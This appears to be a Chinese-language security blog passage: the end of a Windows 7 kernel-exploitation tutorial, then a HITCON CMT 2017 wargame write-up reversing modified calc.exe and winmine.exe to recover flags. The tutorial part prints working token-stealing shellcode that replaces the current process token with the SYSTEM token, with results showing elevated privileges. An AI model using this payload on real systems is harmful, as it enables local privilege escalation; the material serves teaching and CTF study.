<li><code class="highlighter-rouge">FS:[0x124]</code> 在 Win 7 上會指向目前 Process 的 <code class="highlighter-rouge">KTHREAD</code></li>
</ul>
<p><img src="https://i.imgur.com/aGbWKxm.png" alt="" /></p>
<ul>
<li><code class="highlighter-rouge">GS</code> 與 <code class="highlighter-rouge">FS</code> 是根據 OS Kernel 來決定用途,<code class="highlighter-rouge">FS</code> 在 Windows 上會指向一些 structure</li>
<li><code class="highlighter-rouge">ETHREAD</code> 結構與 <code class="highlighter-rouge">ERPOCESS</code> 結構圖</li>
</ul>
<p><img src="https://i.imgur.com/FVy7m0t.jpg" alt="" /></p>
<ul>
<li>因為我們將函數 ret 的位置改成我們的 shellcode,Shellcode 執行完會無法回到原本正確的位置,所以為了讓程式能繼續執行,則需要調整 esp 的位置</li>
</ul>
<pre><code class="language-clike=">VOID TokenStealingPayloadWin7() {
// Importance of Kernel Recovery
__asm {
pushad ; Save registers state
; 存目前暫存器的狀態,後面需要還原用
; Start of Token Stealing Stub
xor eax, eax ; Set ZERO
mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PcrbData.CurrentThread
; _KTHREAD is located at FS:[0x124]
; 取得目前 Process 的 KTHREAD 放到 eax
mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process
; 取得[目前 Process 的 KTHREAD + EPROCESS_OFFSET] 的位置放到 eax
mov ecx, eax ; Copy current process _EPROCESS structure
; 複製目前 Process 的 Eprocess structure 到 ecx
mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4
SearchSystemPID:
mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
; 從目前 eprocess 的 ActiveProcessLinks 找 system 的 eprocess
sub eax, FLINK_OFFSET ; Flink 會指向下個 eprocess 的 ActiveProcessLinks 所在位置(而不是開頭),所以需要 sub FLINK_OFFSET 回到下個 eprocess 的開頭
cmp [eax + PID_OFFSET], edx ; Get nt!_EPROCESS.UniqueProcessId
; 比較 nt!_EPROCESS.UniqueProcessId 是不是 4
jne SearchSystemPID ; 如果不是 4 就重新找,所以當跳出這個迴圈出來一定會是 4
mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
; edx 指向 token 所在位置
mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
; with SYSTEM process nt!_EPROCESS.Token
; 將目前 process token 換成 system token
; End of Token Stealing Stub
popad ; Restore registers state
; Kernel Recovery Stub
xor eax, eax ; Set NTSTATUS SUCCEESS
add esp, 12 ; Fix the stack
pop ebp ; Restore saved EBP
ret 8 ; Return cleanly
}
}
</code></pre>
<h3 id="result">Result</h3>
<p>開啟 cmd.exe 使用 <code class="highlighter-rouge">whoami</code> 看目前的權限</p>
<p><img src="https://i.imgur.com/8dXeTWf.png" alt="" /></p>
<p>執行 Exploit code</p>
<p><img src="https://i.imgur.com/uEdzuZG.png" alt="" /></p>
<p>再次開啟 cmd.exe 使用 <code class="highlighter-rouge">whoami</code> 看目前的權限</p>
<p><img src="https://i.imgur.com/oBqLnbi.png" alt="" /></p>
<h3 id="resources">Resources</h3>
<ul>
<li><a href="http://www.codemachine.com/article_kernelstruct.html">codemachine - Windows kernel data structures</a></li>
<li><a href="http://www.codemachine.com/article_kernelstruct.html">McDermott - x64 Kernel Privilege Escalation</a></li>
<li><a href="https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives">coresecurity - Abusing GDI for ring0 exploit primitives</a></li>
<li><a href="http://www.fuzzysecurity.com/tutorials/expDev/14.html">fuzzysecurity - Kernel Exploitation Stack Overflow</a></li>
<li><a href="http://www.mista.nu/research/MANDT-kernelpool-PAPER.pdf">Tarjei Mandt - Kernel Pool Exploitation on Windows 7</a></li>
<li><a href="http://magazine.hitb.org/issues/HITB-Ezine-Issue-003.pdf">j00ru - Reserve Objects in Windows 7</a></li>
</ul>
2017 HITCON CMT mini wargame Reverse
2017-08-26T00:00:00+00:00
http://0x00.tw/2017/08/26/2017 HITCON CMT mini wargame
<p>今年 HITCON 在 HITCON CMT 研討會期間又舉辦了與前幾年類似的 wargame,相較於 HITCON CTF 是比較簡單的小型競賽。很幸運跟以色列的朋友一起組隊,因為我很 Lazy 而他們是 Hacker,所以隊名就取 <code class="highlighter-rouge">Lazyhacker</code>。在團隊中我負責解 Reverse 的題型,這次 Reverse 只有兩題,都是 Windows 題,分別是小算盤跟踩地雷,還蠻有趣的,所以想紀錄一下。</p>
<hr />
<h2 id="100-calcexe">[100] calc.exe</h2>
<h3 id="題目描述">題目描述</h3>
<p>毫無反應,就是一個具有計算功能的計算機。</p>
<p><img src="https://i.imgur.com/DMo6dMi.png" alt="" /></p>
<h3 id="解法">解法</h3>
<p>觀察發現似乎跟 Windows 的小算盤一模一樣,因此拿了 Windows 原版的 <code class="highlighter-rouge">calc.exe</code> 執行檔來做 diff ( 這裡用 <code class="highlighter-rouge">vimdiff</code> ),發現其中多了一些看起來很可疑的 code</p>
<p><img src="https://i.imgur.com/6NRAkp5.png" alt="" /></p>
<p>放進 IDA Pro 分析 <code class="highlighter-rouge">sub_10136B0()</code> (可以 search opcode 或計算 offset),得知是在做某種字串的比對</p>
<p><img src="https://i.imgur.com/NAUhSNt.png" alt="" /></p>
<p>簡化來說,就是取數字框的 <code class="highlighter-rouge">HWND</code>,讀數字框上面的文字,並驗證這段文字</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HWND hwnd = GetDlgItem(g_hWnd, 403); // 403 是數字框的控制項 ID
GetWindowTextA(hwnd, buf, 256);
驗證這段文字
</code></pre></div></div>
<p>[補充] 控制項的 ID 可以透過 Resource Hacker 來看
<img src="https://i.imgur.com/VPDAWFP.png" alt="" /></p>
<p>也可以用 ollydbg 追蹤來理解程式的行為,透過追蹤可以知道: 當按下 <code class="highlighter-rouge">=</code> 時,會跳到這個有被改過的地方,至於要輸入什麼數字才會跳出 FLAG 呢? 可以停在 <code class="highlighter-rouge">101371A</code> 這裡看他怎麼比較的,他比較的值分別是<code class="highlighter-rouge">0x31323035</code>, <code class="highlighter-rouge">0x32303536</code>, <code class="highlighter-rouge">0x352E3631</code> 與 <code class="highlighter-rouge">0x36313230</code></p>
<p><img src="https://i.imgur.com/jl2IAu6.png" alt="" /></p>
<p>對照 ASCII 表並考慮 little endian 的話,就是 <code class="highlighter-rouge">5021650216.50216</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x31323035 --> 5021
0x32303536 --> 6502
0x352E3631 --> 16.5
0x36313230 --> 0216
</code></pre></div></div>
<p>如果用 IDA Pro 來看的話也可以解回來,判斷的部分為
<img src="https://i.imgur.com/kQuEkdy.png" alt="" /></p>
<p>因此只要在視窗中輸入<code class="highlighter-rouge">5021650216.50216</code> 並按下 <code class="highlighter-rouge">=</code>
<img src="https://i.imgur.com/7qEETTe.png" alt="" /></p>
<p>就會跳出小框框顯示 Flag
<img src="https://i.imgur.com/QTbNeYZ.png" alt="" />
<code class="highlighter-rouge">The flag is: hitcon{50216_is_our_god}</code></p>
<h2 id="200-winmineexe">[200] winmine.exe</h2>
<h3 id="題目描述-1">題目描述</h3>
<p>一個不平凡的踩地雷,開啟就是 40*40 的大小,除了特定的位置外,其他格子都是地雷</p>
<p><img src="https://i.imgur.com/f4v3lfE.png" alt="" />
<img src="https://i.imgur.com/PbyCTrV.png" alt="" /></p>
<h3 id="解法-1">解法</h3>
<p>踩地雷遊戲,執行後很幸運地踩到了幾次正確位置</p>
<p><img src="https://i.imgur.com/16XPA2L.jpg" alt="" />
<img src="https://i.imgur.com/jmsMbVy.jpg" alt="" /></p>
<p>猜想 “正確位置出現的形狀” 可能依序就是整串 FLAG 依序出現的順序( 可能是 <code class="highlighter-rouge">THE flag is hitcon{xxx}</code> 之類的 ),因此期望在 IDA Pro 之中看到放的位置</p>
<p>在 <code class="highlighter-rouge">sub_962880()</code> 之中有 <code class="highlighter-rouge">MessageBoxA(0, "Are u a hacker O_o?", "O_o?", 0x20u);</code> 猜想可能驗證 flag 相關的東西在附近</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.text:009629E1 loc_9629E1: ; CODE XREF: sub_962880+12Dj
.text:009629E1 mov ebx, ds:GetTickCount
.text:009629E7 add edi, 0FFFFFFFDh
.text:009629EA call ebx ; GetTickCount
.text:009629EC xor edx, edx
.text:009629EE mov ecx, 0FFh
.text:009629F3 div ecx
.text:009629F5 mov esi, edx
.text:009629F7 call sub_965797
.text:009629FC add eax, esi
.text:009629FE xor edx, edx
.text:00962A00 div edi
.text:00962A02 lea esi, [edx+1]
.text:00962A05 call ebx ; GetTickCount
.text:00962A07 call sub_965797
.text:00962A0C mov ecx, g_check
.text:00962A12 mov edx, 5
.text:00962A17 shl ecx, 4
.text:00962A1A sub ecx, g_check
.text:00962A20 imul eax, esi, 65h
.text:00962A23 add ecx, offset g_enc
.text:00962A29 add eax, offset unk_9775E1
.text:00962A2E xchg ax, ax
.text:00962A30
</code></pre></div></div>
<p>最後從 <code class="highlighter-rouge">0x00962A23</code> 跳過去 <code class="highlighter-rouge">0x00973BD9</code> 會看到這段</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.rdata:00973BD8 db 1
.rdata:00973BD9 g_enc db 1 ; DATA XREF: sub_962880+1A3o
.rdata:00973BDA db 1
.rdata:00973BDB db 0
.rdata:00973BDC db 1
.rdata:00973BDD db 0
.rdata:00973BDE db 0
.rdata:00973BDF db 1
.rdata:00973BE0 db 0
.rdata:00973BE1 db 0
.rdata:00973BE2 db 1
.rdata:00973BE3 db 0
.rdata:00973BE4 db 0
.rdata:00973BE5 db 1
.rdata:00973BE6 db 0
.rdata:00973BE7 db 1
.rdata:00973BE8 db 0
.rdata:00973BE9 db 1
.rdata:00973BEA db 1
.rdata:00973BEB db 0
.rdata:00973BEC db 1
.rdata:00973BED db 1
.rdata:00973BEE db 1
.rdata:00973BEF db 1
.rdata:00973BF0 db 1
.rdata:00973BF1 db 0
.rdata:00973BF2 db 1
.rdata:00973BF3 db 1
.rdata:00973BF4 db 0
.rdata:00973BF5 db 1
.rdata:00973BF6 db 1
.rdata:00973BF7 db 1
.rdata:00973BF8 db 1
.rdata:00973BF9 db 1
.rdata:00973BFA db 0
.rdata:00973BFB db 0
.rdata:00973BFC db 1
.rdata:00973BFD db 1
.rdata:00973BFE db 1
.rdata:00973BFF db 1
.rdata:00973C00 db 0
.rdata:00973C01 db 0
.rdata:00973C02 db 1
.rdata:00973C03 db 1
.rdata:00973C04 db 1
.rdata:00973C05 db 1
.rdata:00973C06 db 1
.rdata:00973C07 db 1
.rdata:00973C08 db 1
.rdata:00973C09 db 0
.rdata:00973C0A db 0
.rdata:00973C0B db 1
.rdata:00973C0C db 1
.rdata:00973C0D db 1
.rdata:00973C0E db 1
.rdata:00973C0F db 0
.rdata:00973C10 db 0
.rdata:00973C11 db 1
.rdata:00973C12 db 0
.rdata:00973C13 db 0
.rdata:00973C14 db 1
.rdata:00973C15 db 0
.rdata:00973C16 db 0
.rdata:00973C17 db 1
.rdata:00973C18 db 0
.rdata:00973C19 db 0
.rdata:00973C1A db 1
.rdata:00973C1B db 0
.rdata:00973C1C db 0
.rdata:00973C1D db 1
.rdata:00973C1E db 0
.rdata:00973C1F db 0
.rdata:00973C20 db 1
.rdata:00973C21 db 1
.rdata:00973C22 db 1
.rdata:00973C23 db 1
.rdata:00973C24 db 1
.rdata:00973C25 db 1
.rdata:00973C26 db 1
.rdata:00973C27 db 0
.rdata:00973C28 db 1
.rdata:00973C29 db 1
.rdata:00973C2A db 1
.rdata:00973C2B db 1
.rdata:00973C2C db 1
.rdata:00973C2D db 0
.rdata:00973C2E db 1
.rdata:00973C2F db 1
.rdata:00973C30 db 0
.rdata:00973C31 db 1
.rdata:00973C32 db 1
.rdata:00973C33 db 1
.rdata:00973C34 db 1
.rdata:00973C35 db 1
.rdata:00973C36 db 0
.rdata:00973C37 db 0
.rdata:00973C38 db 1
.rdata:00973C39 db 0
.rdata:00973C3A db 1
.rdata:00973C3B db 1
.rdata:00973C3C db 0
.rdata:00973C3D db 1
.rdata:00973C3E db 1
.rdata:00973C3F db 1
.rdata:00973C40 db 1
.rdata:00973C41 db 1
.rdata:00973C42 db 1
.rdata:00973C43 db 1
.rdata:00973C44 db 0
.rdata:00973C45 db 1
.rdata:00973C46 db 0
.rdata:00973C47 db 0
.rdata:00973C48 db 1
.rdata:00973C49 db 0
.rdata:00973C4A db 0
.rdata:00973C4B db 1
.rdata:00973C4C db 0
.rdata:00973C4D db 1
.rdata:00973C4E db 1
.rdata:00973C4F db 1
.rdata:00973C50 db 1
.rdata:00973C51 db 1
.rdata:00973C52 db 1
.rdata:00973C53 db 1
.rdata:00973C54 db 0
.rdata:00973C55 db 0
.rdata:00973C56 db 1
.rdata:00973C57 db 1
.rdata:00973C58 db 1
.rdata:00973C59 db 0
.rdata:00973C5A db 0
.rdata:00973C5B db 1
.rdata:00973C5C db 1
.rdata:00973C5D db 1
.rdata:00973C5E db 1
.rdata:00973C5F db 1
.rdata:00973C60 db 0
.rdata:00973C61 db 0
.rdata:00973C62 db 1
.rdata:00973C63 db 0
.rdata:00973C64 db 0
.rdata:00973C65 db 1
.rdata:00973C66 db 1
.rdata:00973C67 db 1
.rdata:00973C68 db 1
.rdata:00973C69 db 0
.rdata:00973C6A db 1
.rdata:00973C6B db 1
.rdata:00973C6C db 0
.rdata:00973C6D db 1
.rdata:00973C6E db 0
.rdata:00973C6F db 0
.rdata:00973C70 db 0
.rdata:00973C71 db 0
.rdata:00973C72 db 1
.rdata:00973C73 db 0
.rdata:00973C74 db 0
.rdata:00973C75 db 0
.rdata:00973C76 db 0
.rdata:00973C77 db 0
.rdata:00973C78 db 1
.rdata:00973C79 db 0
.rdata:00973C7A db 0
.rdata:00973C7B db 1
.rdata:00973C7C db 0
.rdata:00973C7D db 0
.rdata:00973C7E db 0
.rdata:00973C7F db 0
.rdata:00973C80 db 0
.rdata:00973C81 db 1
.rdata:00973C82 db 0
.rdata:00973C83 db 1
.rdata:00973C84 db 1
.rdata:00973C85 db 1
.rdata:00973C86 db 0
.rdata:00973C87 db 1
.rdata:00973C88 db 0
.rdata:00973C89 db 0
.rdata:00973C8A db 1
.rdata:00973C8B db 0
.rdata:00973C8C db 0
.rdata:00973C8D db 0
.rdata:00973C8E db 0
.rdata:00973C8F db 0
.rdata:00973C90 db 0
.rdata:00973C91 db 0
.rdata:00973C92 db 1
.rdata:00973C93 db 1
.rdata:00973C94 db 1
.rdata:00973C95 db 1
.rdata:00973C96 db 0
.rdata:00973C97 db 0
.rdata:00973C98 db 1
.rdata:00973C99 db 1
.rdata:00973C9A db 1
.rdata:00973C9B db 0
.rdata:00973C9C db 0
.rdata:00973C9D db 0
.rdata:00973C9E db 0
.rdata:00973C9F db 0
.rdata:00973CA0 db 0
.rdata:00973CA1 db 1
.rdata:00973CA2 db 1
.rdata:00973CA3 db 1
.rdata:00973CA4 db 1
.rdata:00973CA5 db 0
.rdata:00973CA6 db 1
.rdata:00973CA7 db 1
.rdata:00973CA8 db 1
.rdata:00973CA9 db 1
.rdata:00973CAA db 0
.rdata:00973CAB db 0
.rdata:00973CAC db 0
.rdata:00973CAD db 0
.rdata:00973CAE db 0
.rdata:00973CAF db 0
.rdata:00973CB0 db 1
.rdata:00973CB1 db 1
.rdata:00973CB2 db 0
.rdata:00973CB3 db 1
.rdata:00973CB4 db 0
.rdata:00973CB5 db 1
.rdata:00973CB6 db 1
.rdata:00973CB7 db 0
.rdata:00973CB8 db 1
.rdata:00973CB9 db 0
.rdata:00973CBA db 1
.rdata:00973CBB db 1
.rdata:00973CBC db 0
.rdata:00973CBD db 1
.rdata:00973CBE db 0
.rdata:00973CBF db 1
.rdata:00973CC0 db 1
.rdata:00973CC1 db 0
.rdata:00973CC2 db 0
.rdata:00973CC3 db 1
.rdata:00973CC4 db 0
.rdata:00973CC5 db 0
.rdata:00973CC6 db 1
.rdata:00973CC7 db 1
.rdata:00973CC8 db 1
.rdata:00973CC9 db 1
.rdata:00973CCA db 0
.rdata:00973CCB db 1
.rdata:00973CCC db 0
.rdata:00973CCD db 1
.rdata:00973CCE db 1
.rdata:00973CCF db 1
.rdata:00973CD0 db 1
.rdata:00973CD1 db 1
.rdata:00973CD2 db 0
.rdata:00973CD3 db 1
.rdata:00973CD4 db 1
.rdata:00973CD5 db 1
.rdata:00973CD6 db 1
.rdata:00973CD7 db 1
.rdata:00973CD8 db 1
.rdata:00973CD9 db 1
.rdata:00973CDA db 1
.rdata:00973CDB db 0
.rdata:00973CDC db 1
.rdata:00973CDD db 1
.rdata:00973CDE db 0
.rdata:00973CDF db 1
.rdata:00973CE0 db 1
.rdata:00973CE1 db 0
.rdata:00973CE2 db 1
.rdata:00973CE3 db 1
.rdata:00973CE4 db 1
.rdata:00973CE5 db 1
.rdata:00973CE6 db 1
.rdata:00973CE7 db 1
.rdata:00973CE8 db 1
.rdata:00973CE9 db 1
.rdata:00973CEA db 0
.rdata:00973CEB db 1
.rdata:00973CEC db 1
.rdata:00973CED db 0
.rdata:00973CEE db 1
.rdata:00973CEF db 1
.rdata:00973CF0 db 0
.rdata:00973CF1 db 1
.rdata:00973CF2 db 1
.rdata:00973CF3 db 1
.rdata:00973CF4 db 1
.rdata:00973CF5 db 1
.rdata:00973CF6 db 0
.rdata:00973CF7 db 1
.rdata:00973CF8 db 1
.rdata:00973CF9 db 1
.rdata:00973CFA db 1
.rdata:00973CFB db 1
.rdata:00973CFC db 0
.rdata:00973CFD db 1
.rdata:00973CFE db 1
.rdata:00973CFF db 0
.rdata:00973D00 db 1
.rdata:00973D01 db 1
.rdata:00973D02 db 0
.rdata:00973D03 db 1
.rdata:00973D04 db 0
.rdata:00973D05 db 1
.rdata:00973D06 db 0
.rdata:00973D07 db 0
.rdata:00973D08 db 1
.rdata:00973D09 db 0
.rdata:00973D0A db 0
.rdata:00973D0B db 1
.rdata:00973D0C db 0
.rdata:00973D0D db 0
.rdata:00973D0E db 0
.rdata:00973D0F db 0
.rdata:00973D10 db 0
.rdata:00973D11 db 1
.rdata:00973D12 db 0
.rdata:00973D13 db 1
.rdata:00973D14 db 1
.rdata:00973D15 db 0
.rdata:00973D16 db 0
.rdata:00973D17 db 1
.rdata:00973D18 db 0
.rdata:00973D19 db 0
.rdata:00973D1A db 1
.rdata:00973D1B db 1
.rdata:00973D1C db 0
.rdata:00973D1D db 1
.rdata:00973D1E db 0
.rdata:00973D1F db 1
.rdata:00973D20 db 1
.rdata:00973D21 db 0
.rdata:00973D22 db 0
.rdata:00973D23 db 0
</code></pre></div></div>
<p>將每 15 個字為一組,其中 3 個為一行的排法,排出第一個字為</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>111
010
010
010
010
</code></pre></div></div>
<p>看起來就是 <code class="highlighter-rouge">T</code>,那麼將 22 個字解完就是 <code class="highlighter-rouge">THE FLAG is hitcon{BOOM!}</code></p>
<p>如果出題者對這些字做 XOR 就比較困難了,好險好險</p>
<hr />
<p>最後我們拿了第一名,感謝 Lazyhacker 、HITCON CMT 籌備團隊、mini wargame 出題者以及幫助過我的人</p>
<p>後記: 結束後,跟 <code class="highlighter-rouge">d3vc0r3</code> 交流,得知 Web 滲透測試專家對於 Reverse 題 <code class="highlighter-rouge">winmine.exe</code> 的解法相當可愛,每猜中一個字,就利用 VMware 做 snapshot,如此一來,就可以輕鬆快樂的猜下一個字了,真是太睿智XD </p>